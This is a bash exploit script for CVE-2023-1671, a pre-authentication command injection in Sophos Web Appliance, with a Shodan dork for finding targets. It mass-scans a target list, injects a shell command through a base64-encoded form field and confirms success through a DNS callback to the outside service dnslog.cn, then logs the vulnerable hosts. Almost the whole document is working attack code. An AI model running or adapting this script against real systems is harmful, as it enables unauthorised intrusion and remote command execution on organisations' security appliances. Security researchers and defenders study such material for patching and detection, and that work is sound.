Sophos Web Appliance 4.3.10.4 Command Injection

#!/bin/bash 
# Exploit Title: Sophos Web Appliance 4.3.10.4 - Pre-auth command injection
# Exploit Author: Behnam Abasi Vanda
# Vendor Homepage: https://www.sophos.com
# Version:  Sophos Web Appliance older than version 4.3.10.4
# Tested on: Ubuntu
# CVE : CVE-2023-1671
# Shodan Dork: title:"Sophos Web Appliance"
# Reference : https://www.sophos.com/en-us/security-advisories/sophos-sa-20230404-swa-rce
# Reference : https://vulncheck.com/blog/cve-2023-1671-analysis



TARGET_LIST="$1"

# =====================
BOLD="33[1m"
RED="e[1;31m"
GREEN="e[1;32m"
YELLOW="e[1;33m"
BLUE="e[1;34m"
NOR="e[0m"
# ====================


get_new_subdomain()
{
cat  MN.txt | grep 'YES' >/dev/null;ch=$?
           if [ $ch -eq 0 ];then
    echo -e "  [+] Trying to get Subdomain $NOR"
     rm -rf cookie.txt
    sub=`curl -i -c cookie.txt -s -k -X $'GET' 
          -H $'Host: www.dnslog.cn' -H $'User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/112.0' -H $'Accept: */*' -H $'Accept-Language: en-US,en;q=0.5' -H $'Accept-Encoding: gzip, deflate' -H $'Connection: close' -H $'Referer: http://www.dnslog.cn/' 
      $'http://www.dnslog.cn/getdomain.php?t=0' | grep dnslog.cn` 
           echo -e "  [+]$BOLD$GREEN Subdomain : $sub $NOR"
       fi
}

check_vuln()
{
curl -k --trace-ascii % "https://$1/index.php?c=blocked&action=continue" -d "args_reason=filetypewarn&url=$RANDOM&filetype=$RANDOM&user=$RANDOM&user_encoded=$(echo -n "';ping $sub -c 3 #" | base64)"

req=`curl -i -s -k -b cookie.txt -X $'GET' 
    -H $'Host: www.dnslog.cn' -H $'User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/112.0' -H $'Accept: */*' -H $'Accept-Language: en-US,en;q=0.5' -H $'Accept-Encoding: gzip, deflate' -H $'Connection: close' -H $'Referer: http://www.dnslog.cn/' 
       $'http://www.dnslog.cn/getrecords.php?t=0'`

echo "$req"  | grep 'dnslog.cn' >/dev/null;ch=$?
           if [ $ch -eq 0 ];then
             echo "YES" > MN.txt
    echo -e "  [+]$BOLD $RED https://$1 Vulnerable :D $NOR"
    echo "https://$1" >> vulnerable.lst      
          else 
           echo -e "  [-] https://$1 Not Vulnerable :| $NOR"
         echo "NO" > MN.txt
     fi
}

echo '

 ██████╗██╗   ██╗███████╗    ██████╗  ██████╗ ██████╗ ██████╗        ██╗ ██████╗███████╗
██╔════╝██║   ██║██╔════╝    ╚════██╗██╔═████╗╚════██╗╚════██╗      ███║██╔════╝╚════██║
██║     ██║   ██║█████╗█████╗ █████╔╝██║██╔██║ █████╔╝ █████╔╝█████╗╚██║███████╗    ██╔╝
██║     ╚██╗ ██╔╝██╔══╝╚════╝██╔═══╝ ████╔╝██║██╔═══╝  ╚═══██╗╚════╝ ██║██╔═══██╗  ██╔╝ 
╚██████╗ ╚████╔╝ ███████╗    ███████╗╚██████╔╝███████╗██████╔╝       ██║╚██████╔╝  ██║  
 ╚═════╝  ╚═══╝  ╚══════╝    ╚══════╝ ╚═════╝ ╚══════╝╚═════╝        ╚═╝ ╚═════╝   ╚═╝  

██████╗ ██╗   ██╗    ██████╗ ███████╗██╗  ██╗███╗   ██╗ █████╗ ███╗   ███╗       ██╗    
██╔══██╗╚██╗ ██╔╝    ██╔══██╗██╔════╝██║  ██║████╗  ██║██╔══██╗████╗ ████║    ██╗╚██╗   
██████╔╝ ╚████╔╝     ██████╔╝█████╗  ███████║██╔██╗ ██║███████║██╔████╔██║    ╚═╝ ██║   
██╔══██╗  ╚██╔╝      ██╔══██╗██╔══╝  ██╔══██║██║╚██╗██║██╔══██║██║╚██╔╝██║    ▄█╗ ██║   
██████╔╝   ██║       ██████╔╝███████╗██║  ██║██║ ╚████║██║  ██║██║ ╚═╝ ██║    ▀═╝██╔╝   
╚═════╝    ╚═╝       ╚═════╝ ╚══════╝╚═╝  ╚═╝╚═╝  ╚═══╝╚═╝  ╚═╝╚═╝     ╚═╝       ╚═╝    

                                                                                        '
if test "$#" -ne 1; then
    echo       "   ----------------------------------------------------------------"
    echo "    [!] please give the target list file : bash CVE-2023-1671.sh targets.txt "
    echo       "   ---------------------------------------------------------------"
    exit
fi



rm -rf cookie.txt
echo "YES" > MN.txt
for target in `cat $TARGET_LIST`
do

get_new_subdomain;
echo "  [~] Checking $target"
  check_vuln "$target"
done
rm -rf MN.txt
rm -rf cookie.txt